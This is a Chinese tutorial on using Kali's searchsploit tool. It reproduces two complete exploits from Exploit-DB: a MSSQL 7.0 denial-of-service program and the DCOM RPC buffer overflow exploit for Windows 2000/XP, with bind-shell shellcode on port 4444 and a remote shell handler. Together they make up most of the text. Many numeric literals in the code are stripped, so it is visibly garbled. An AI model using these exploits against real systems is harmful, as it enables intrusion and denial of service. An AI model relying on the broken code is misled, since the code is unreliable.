Searchsploit

  Searchsploit会通过本地的exploit-db, 查找软件漏洞信息

  打开kali的命令行, 输入:

searchsploit

  查看系统帮助

  查找mssql的漏洞

  如果要查找 mssql的漏洞, 命令如下, 会找到所有和mssql相关的漏洞信息, 后面还有相关的漏洞描述信息:

searchsploit mssql

  要看相关的漏洞描述, 如果要看mysql7.0的远程DOS漏洞 , 把漏洞描述后面的路径用编辑器打开即可:

leafpad /usr/share/exploitdb/platforms/./windows/dos/.c

  文本文件里面的内容为漏洞说明文件和漏洞利用文件:

 /* Microsoft mssql 7.0 server is vulnerable to denial of service attack

* By sending a large buffer with specified data an attacker can stop

the service

* "mssqlserver" the error noticed is different according to services'

pack but the result is always

* the same one.

* Exception Codes = c0000005

* vulnerable: MSSQL7.0 sp0 - sp1 - sp2 - sp3

* This code is for educational purposes, I am not responsible for your acts

* Greets:sm0g DEADm|x #crack.fr itmaroc and evryone who I forgot */

#include <stdio.h>

#include <winsock.h>

#pragma comment(lib,"ws2_32")

u_long resolv(char*);

void main(int argc, char **argv) {

WSADATA WinsockData;

SOCKET s;

int i;

struct sockaddr_in vulh;

char buffer[];

for(i=;i<;i+=)memcpy(buffer+i,"\x10\x00\x00\x10\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc",);

if (argc!=) {

printf(" MSSQL denial of service\n");

printf(" by securma massine\n");

printf("Cet outil a ete cree pour test ,je ne suis en aucun cas

responsable des degats que vous pouvez en faire\n");

printf("Syntaxe: MSSQLdos <ip> <port>\n");

exit();

}

WSAStartup(0x101,&WinsockData);

s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

ZeroMemory(&vulh,sizeof(vulh));

vulh.sin_family=AF_INET;

vulh.sin_addr.s_addr=resolv(argv[]);

vulh.sin_port=htons(atoi(argv[]));

if (connect(s,(struct sockaddr*)&vulh,sizeof(vulh))==SOCKET_ERROR) {

printf("Impossible de se connecter...le port est en generale 1433...\n");

exit();

}

{

send(s,buffer,sizeof(buffer),);

printf("Data envoyes...\n");

}

printf("\nattendez quelques secondes et verifiez que le serveur ne

repond plus.\n");

closesocket(s);

WSACleanup();

}

u_long resolv(char *host_name) {

struct in_addr addr;

struct hostent *host_ent;

if ((addr.s_addr = inet_addr(host_name)) == -) {

if (!(host_ent = gethostbyname(host_name))) {

printf ("Erreur DNS : Impossible de résoudre l'adresse %s

!!!\n",host_name);

exit();

}

CopyMemory((char *)&addr.s_addr,host_ent->h_addr,host_ent->h_length);

}

return addr.s_addr;

}

// milw0rm.com [2004-09-29]

  查找和window XP有关的漏洞

searchsploit /xp

  查看漏洞利用文件:

leafpad /usr/share/exploitdb/platforms/./windows/remote/.c
/*

  DCOM RPC Overflow Discovered by LSD - Exploit Based on Xfocus's Code

  Written by H D Moore <hdm [at] metasploit.com>

  - Usage: ./dcom <Target ID> <Target IP>

  - Targets:

  -          0    Windows 2000 SP0 (english)

  -          1    Windows 2000 SP1 (english)

  -          2    Windows 2000 SP2 (english)

  -          3    Windows 2000 SP3 (english)

  -          4    Windows 2000 SP4 (english)

  -          5    Windows XP SP0 (english)

  -          6    Windows XP SP1 (english)

*/

#include <stdio.h>

#include <stdlib.h>

#include <error.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <arpa/inet.h>

#include <unistd.h>

#include <netdb.h>

#include <fcntl.h>

#include <unistd.h>

unsigned char bindstr[]={

0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,

0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,

0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,

0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,

0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={

0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03

,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00

,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45

,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E

,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D

,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41

,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00

,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45

,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00

,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00

,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03

,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00

,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29

,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00

,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00

,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF

,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09

,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00

,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00

,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00

,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00

,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01

,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03

,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00

,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E

,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00

,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00

,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00

,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00

,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={

0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00

,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={

0x5C,0x00

,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00

,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00

,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00

,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};

unsigned char *targets [] =

        {

            "Windows 2000 SP0 (english)",

            "Windows 2000 SP1 (english)",

            "Windows 2000 SP2 (english)",

            "Windows 2000 SP3 (english)",

            "Windows 2000 SP4 (english)",

            "Windows XP SP0 (english)",

            "Windows XP SP1 (english)",

             NULL

        };

unsigned long offsets [] =

        {

            0x77e81674,

            0x77e829ec,

            0x77e824b5,

            0x77e8367a,

            0x77f92a9b,

            0x77e9afe3,

            0x77e626ba,

        };

unsigned char sc[]=

    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"

    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"

    "\x46\x00\x58\x00\x46\x00\x58\x00"

    "\xff\xff\xff\xff" /* return address */

    "\xcc\xe0\xfd\x7f" /* primary thread data block */

    "\xcc\xe0\xfd\x7f" /* primary thread data block */

    /* port 4444 bindshell */

    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"

    "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"

    "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"

    "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"

    "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"

    "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"

    "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"

    "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"

    "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"

    "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"

    "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"

    "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"

    "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"

    "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"

    "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"

    "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"

    "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"

    "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"

    "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"

    "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"

    "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"

    "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"

    "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"

    "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"

    "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"

    "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"

    "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"

    "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"

    "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"

    "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"

    "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"

    "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";

unsigned char request4[]={

0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00

,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C

,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00

};

/* ripped from TESO code */

void shell (int sock)

{

        int     l;

        char    buf[];

        fd_set  rfds;

        while () {

                FD_SET (, &rfds);

                FD_SET (sock, &rfds);

                select (sock + , &rfds, NULL, NULL, NULL);

                if (FD_ISSET (, &rfds)) {

                        l = read (, buf, sizeof (buf));

                        if (l <= ) {

                                printf("\n - Connection closed by local user\n");

                                exit (EXIT_FAILURE);

                        }

                        write (sock, buf, l);

                }

                if (FD_ISSET (sock, &rfds)) {

                        l = read (sock, buf, sizeof (buf));

                        if (l == ) {

                                printf ("\n - Connection closed by remote host.\n");

                                exit (EXIT_FAILURE);

                        } else if (l < ) {

                                printf ("\n - Read failure\n");

                                exit (EXIT_FAILURE);

                        }

                        write (, buf, l);

                }

        }

}

int main(int argc, char **argv)

{

    int sock;

    int len,len1;

    unsigned int target_id;

    unsigned long ret;

    struct sockaddr_in target_ip;

    unsigned short port = ;

    unsigned char buf1[0x1000];

    unsigned char buf2[0x1000];

    printf("---------------------------------------------------------\n");

    printf("- Remote DCOM RPC Buffer Overflow Exploit\n");

    printf("- Original code by FlashSky and Benjurry\n");

    printf("- Rewritten by HDM <hdm [at] metasploit.com>\n");

    if(argc<)

    {

        printf("- Usage: %s <Target ID> <Target IP>\n", argv[]);

        printf("- Targets:\n");

        for (len=; targets[len] != NULL; len++)

        {

            printf("-          %d\t%s\n", len, targets[len]);

        }

        printf("\n");

        exit();

    }

    /* yeah, get over it :) */

    target_id = atoi(argv[]);

    ret = offsets[target_id];

    printf("- Using return address of 0x%.8x\n", ret);

    memcpy(sc+, (unsigned char *) &ret, );

    target_ip.sin_family = AF_INET;

    target_ip.sin_addr.s_addr = inet_addr(argv[]);

    target_ip.sin_port = htons(port);

    if ((sock=socket(AF_INET,SOCK_STREAM,)) == -)

    {

        perror("- Socket");

        return();

    }

    if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != )

    {

        perror("- Connect");

        return();

    }

    len=sizeof(sc);

    memcpy(buf2,request1,sizeof(request1));

    len1=sizeof(request1);

    *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/;

    *(unsigned long *)(request2+)=*(unsigned long *)(request2+)+sizeof(sc)/;

    memcpy(buf2+len1,request2,sizeof(request2));

    len1=len1+sizeof(request2);

    memcpy(buf2+len1,sc,sizeof(sc));

    len1=len1+sizeof(sc);

    memcpy(buf2+len1,request3,sizeof(request3));

    len1=len1+sizeof(request3);

    memcpy(buf2+len1,request4,sizeof(request4));

    len1=len1+sizeof(request4);

    *(unsigned long *)(buf2+)=*(unsigned long *)(buf2+)+sizeof(sc)-0xc;

    *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;

    *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;

    *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;

    *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;

    *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;

    *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;

    *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;

    if (send(sock,bindstr,sizeof(bindstr),)== -)

    {

            perror("- Send");

            return();

    }

    len=recv(sock, buf1, , );

    if (send(sock,buf2,len1,)== -)

    {

            perror("- Send");

            return();

    }

    close(sock);

    sleep();

    target_ip.sin_family = AF_INET;

    target_ip.sin_addr.s_addr = inet_addr(argv[]);

    target_ip.sin_port = htons();

    if ((sock=socket(AF_INET,SOCK_STREAM,)) == -)

    {

        perror("- Socket");

        return();

    }

    if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != )

    {

        printf("- Exploit appeared to have failed.\n");

        return();

    }   

    printf("- Dropping to System Shell...\n\n");

    shell(sock);

    return();

}

// milw0rm.com [2003-07-26]

  查找apple的漏洞

searchsploit apple

作者: NONO
出处:http://www.cnblogs.com/diligenceday/

QQ:287101329

微信:18101055830

厦门点燃未来网络科技有限公司, 是厦门最好的微信应用, 小程序, 微信网站, 公众号开发公司

如何使用kali的Searchsploit查找软件漏洞的更多相关文章

  1. 使用Fiddler的X5S插件查找XSS漏洞

    OWASP top 10的安全威胁中的CrossSite Scripting(跨站脚本攻击),允许攻击者通过浏览器往网站注入恶意脚本.这种漏洞经常出现在web应用中需要用户输入的地方,如果网站有XSS ...

  2. 禁被ping 软件漏洞升级

    禁被ping:echo “net.ipv4.icmp_echo_ignore_all=1”  /etc/sysctl.conf 软件漏洞升级:yum install openssh bash -y

  3. 书评第003篇:《0day安全:软件漏洞分析技术(第2版)》

    本书基本信息 丛书名:安全技术大系 作者:王清(主编),张东辉.周浩.王继刚.赵双(编著) 出版社:电子工业出版社 出版时间:2011-6-1 ISBN:9787121133961 版次:1 页数:7 ...

  4. 《0day安全软件漏洞分析技术》学习笔记

    最近因为工作需要在看0day的软件漏洞分析,发现这本<0day安全软件漏洞分析技术(第2版)>真是本好书,唯一缺点就是书上的环境是Windows XP 32Bit的,基于现状难以进行实践, ...

  5. Ubuntu 中查找软件安装的位置

    Ubuntu 中查找软件安装的位置 执行该程序 直接执行该程序,有时候一些程序执行时会显示出自己的位置,比如: 用命令 ps -e 找到该程序的名字 用 find 或 whereis 命令查找文件位置 ...

  6. Ubuntu查找软件命令

    查找软件: apt-cache search <your search item>

  7. 软件漏洞--Hello-Shellcode

    软件漏洞--Hello-Shellcode 使用上一次的栈溢出的漏洞软件 可以直接通过栈溢出来修改返回值,或者要跳转的函数地址 实现一个ShellCode来跳转自己的代码 源bug软件代码 #defi ...

  8. 黑暗世界的搜索引擎 https://fofa.so/ https://www.shodan.io https://www.zoomeye.org 查找设备漏洞

    from:http://www.freebuf.com/sectool/121339.html 什么是 Shodan? 首先,Shodan 是一个搜索引擎,但它与 Google 这种搜索网址的搜索引擎 ...

  9. Kali 2.0 日常软件

    目的 如果你用Kali作为学习安全之类的作业,那么他预装的一些软件已经够用了,但是,如果你打算用它来当做日常主要OS,那么安装一些常用软件就是一项重要作业. 软件 如果你是在标准用户下安装,别忘了su ...

随机推荐

  1. iOS关于JSONKit解析Unicode字符内容出错,问题出在\u0000

    JSONKit虽然很强大,但是一些特殊的Unicode,比如\u0000是无法解析的. 在github上作者解释了这个问题,说这个是内容提供的错误,不符合标准的内容,所以他不认为这个是自己的错误,这个 ...

  2. Apriori算法介绍(Python实现)

    导读: 随着大数据概念的火热,啤酒与尿布的故事广为人知.我们如何发现买啤酒的人往往也会买尿布这一规律?数据挖掘中的用于挖掘频繁项集和关联规则的Apriori算法可以告诉我们.本文首先对Apriori算 ...

  3. 关于使用ModelSim中编写testbench模板问题

    对于初学者来说写Testbench测试文件还是比较困难的,但Modelsim和quartus ii都提供了模板,下面就如何使用Modelsim提供的模板进行操作. Modelsim提供了很多Testb ...

  4. php写流程管理

    流程控制即某个人发起一个流程,通过一层一层审核,通过后,完成整个流程,若有一层审核未通过,中断整个流程.即结束! 比如请假流程: 某一员工发起一个请假流程,那么这个流程的节点人员即他的上级,上上级,上 ...

  5. ASP.NET MVC4 微信公众号开发之网页授权(一):搭建基础环境

    首先你得注册并认证一个个人或企业的微信公众号===服务号从而确保获得以下接口权限: 然后打开公众号设置里的功能设置里找到业务域名和网页授权域名分别填上你的域名(注:已备案的域名),如下图所示: 到这里 ...

  6. 在线恶意软件和URL分析集成框架 – MalSub

    malsub是一个基于Python 3.6.x的框架,它的设计遵循了当前最流行的互联网软件架构RESTful架构,并通过其RESTful API应用程序编程接口(API),封装了多个在线恶意软件和UR ...

  7. Composer 中国全量镜像(二)

    一.查看当前镜像地址 在命令行输入如下命令,即可查看镜像地址: $ composer config -g repo.packagist {"type":"composer ...

  8. 【算法系列学习】[kuangbin带你飞]专题十二 基础DP1 F - Piggy-Bank 【完全背包问题】

    https://vjudge.net/contest/68966#problem/F http://blog.csdn.net/libin56842/article/details/9048173 # ...

  9. 安装Vmware 以及 Vmware 中安装Ubuntu 以及其中问题?

    在vmware中安装ubuntu 过程中 安装窗口太小,无法继续下一步? 按住alt键,用鼠标拖动linux的安装窗体,向上移动就能看到下面的确定按钮. 如何安装Vmware-tools? 1.VM菜 ...

  10. IO和socket编程

    五一假期结束了,突然想到3周前去上班的路上看到槐花开的正好.放假也没能采些做槐花糕,到下周肯定就老了.一年就开一次的东西,比如牡丹,花期也就一周.而花开之时,玫瑰和月季无法与之相比.明日黄花蝶也愁.想 ...